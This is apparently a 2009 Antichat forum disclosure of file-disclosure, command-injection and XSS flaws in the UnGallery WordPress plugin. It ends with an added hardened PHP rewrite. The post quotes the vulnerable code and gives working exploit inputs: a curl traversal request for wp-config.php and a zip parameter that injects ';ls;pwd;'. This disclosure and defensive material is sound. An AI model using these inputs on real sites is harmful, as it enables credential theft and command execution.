
16.06.2009, 12:17
Members of Antichat - Level 5
UnGallery
Version: 0.8
Updated: 2009-6-11
Downloads: 226
Remote File Disclosure
PHP code:
if ($_GET['pic']) {
$filename = $_GET['pic']; // taken straight from the query string, no validation
$len = filesize($filename);
$lastslash = strrpos($filename, "/");
$name = substr($filename, $lastslash + 1);
header("Content-type: image/jpeg;\r\n");
header("Content-Length: $len;\r\n");
header("Content-Transfer-Encoding: binary;\r\n");
header('Content-Disposition: inline; filename="'.$name.'"'); // Render the photo inline.
readfile($filename); // arbitrary path readable by the web server is sent back
}
Code:
$ curl http://wordpress/wp-content/plugins/ungallery/source.php?pic=../../../wp-config.php
Shell Command Execution
PHP code:
$dir = "wp-content/plugins/ungallery/pics/" . $_GET['zip']; // unvalidated user input
// Create the arrays with the dir's image files
$dp = opendir($dir);
while ($filename = readdir($dp)) {
if (!is_dir($dir."/pics/".$gallery. "/". $filename)) { // If it's a file, begin
$pic_types = array("JPG", "jpg", "GIF", "gif", "PNG", "png");
if (in_array(substr($filename, -3), $pic_types)) $pic_array[] = $filename; // If it's a image, add it to pic array
}
}
foreach ($pic_array as $filename) {
$media_files = $media_files . " " . $dir . "/" . $filename;
}
$output = `zip -u -j $dir/pics.zip $media_files`; // $dir goes into a shell command line unquoted
print "<pre>$output</pre>";
print 'Complete. The file can be downloaded <a href="./wp-content/plugins/ungallery/source.php?zip=pics/' . $_GET['zip'] . '/pics.zip">here</a>'; // $_GET['zip'] echoed unescaped
print '<br><br>You can return to the gallery <a href="./gallery?gallerylink=' . $_GET['zip'] .'">here.</a>';
Code:
http://wordpress/wp-content/plugins/ungallery/zip.php?zip=non_existing_dir+non_existing_file;ls;pwd;
PS: XSS can be pulled off right here as well.
__________________
use your head
Last edited by oRb; 16.06.2009 at 16:32.
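As an added illustration, not part of the post above and not UnGallery's own code, here is a hardened replacement for both snippets. It assumes galleries live under wp-content/plugins/ungallery/pics/<gallery>/<file> and that the script runs from the plugin directory; the function names, the `UNGALLERY_PICS` constant and the 64-character gallery-name limit are my own choices. The `pic` path is resolved with realpath() and checked for containment inside the pics directory (which defeats `../../../wp-config.php`), the `zip` parameter is restricted to a single path segment before any filesystem call (which rejects `non_existing_dir+non_existing_file;ls;pwd;`), the archive is built with ZipArchive so no shell is involved, and the value echoed back is HTML-escaped, closing the XSS mentioned in the PS.

```php
<?php
// Added example, not the plugin's code. Assumed base directory for all galleries.
define('UNGALLERY_PICS', __DIR__ . '/pics');

// Resolve $pic (e.g. "summer/IMG_0001.jpg") to a real image inside UNGALLERY_PICS.
// realpath() collapses "../" and follows symlinks, so the prefix check catches
// both traversal and links that point outside the tree. Returns null on any doubt.
function ungallery_safe_pic(string $pic): ?string
{
    $base = realpath(UNGALLERY_PICS);
    if ($base === false || $pic === '' || strpos($pic, "\0") !== false) {
        return null;
    }
    $full = realpath($base . '/' . $pic);
    if ($full === false) {
        return null;
    }
    // Must start with "$base/" (not merely "$base", so "pics_evil/..." is rejected too).
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    $ext = strtolower(pathinfo($full, PATHINFO_EXTENSION));
    if (!is_file($full) || !in_array($ext, ['jpg', 'jpeg', 'gif', 'png'], true)) {
        return null;
    }
    return $full;
}

function ungallery_serve_pic(string $pic): void
{
    $full = ungallery_safe_pic($pic);
    if ($full === null) {
        http_response_code(404);
        exit('Not found');
    }
    $mime = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
             'gif' => 'image/gif', 'png' => 'image/png'];
    header('Content-Type: ' . $mime[strtolower(pathinfo($full, PATHINFO_EXTENSION))]);
    header('Content-Length: ' . filesize($full));
    header('Content-Disposition: inline; filename="' . basename($full) . '"');
    readfile($full);
}

// Build <gallery>/pics.zip without a shell. The gallery name is limited to one
// path segment, so ";ls;pwd", spaces and "../" never reach the filesystem, and
// ZipArchive replaces the backtick `zip -u -j ...` invocation entirely.
function ungallery_build_zip(string $gallery): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $gallery)) {
        return null;
    }
    $base = realpath(UNGALLERY_PICS);
    if ($base === false || !is_dir($base . '/' . $gallery)) {
        return null;
    }
    $dir = $base . '/' . $gallery;
    $zipPath = $dir . '/pics.zip';
    $zip = new ZipArchive();
    if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) {
        return null;
    }
    foreach (scandir($dir) as $file) {
        $path = $dir . '/' . $file;
        $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
        if (is_file($path) && in_array($ext, ['jpg', 'jpeg', 'gif', 'png'], true)) {
            $zip->addFile($path, $file); // same effect as zip -j: no directory part
        }
    }
    $zip->close();
    return $zipPath;
}

// Dispatch. Output derived from user input is escaped before being printed.
if (isset($_GET['pic'])) {
    ungallery_serve_pic((string) $_GET['pic']);
} elseif (isset($_GET['zip'])) {
    $gallery = (string) $_GET['zip'];
    $out = ungallery_build_zip($gallery);
    if ($out === null) {
        http_response_code(400);
        exit('Invalid gallery');
    }
    $safe = htmlspecialchars($gallery, ENT_QUOTES, 'UTF-8');
    print 'Complete. The file can be downloaded <a href="./wp-content/plugins/ungallery/source.php?pic='
        . $safe . '/pics.zip">here</a>';
}
```

Note that `ungallery_safe_pic` only serves the four image extensions, so the generated pics.zip would need its own download branch if you keep the original link target; the point of the example is the validation order: reject by syntax, resolve, check containment, and only then touch the file.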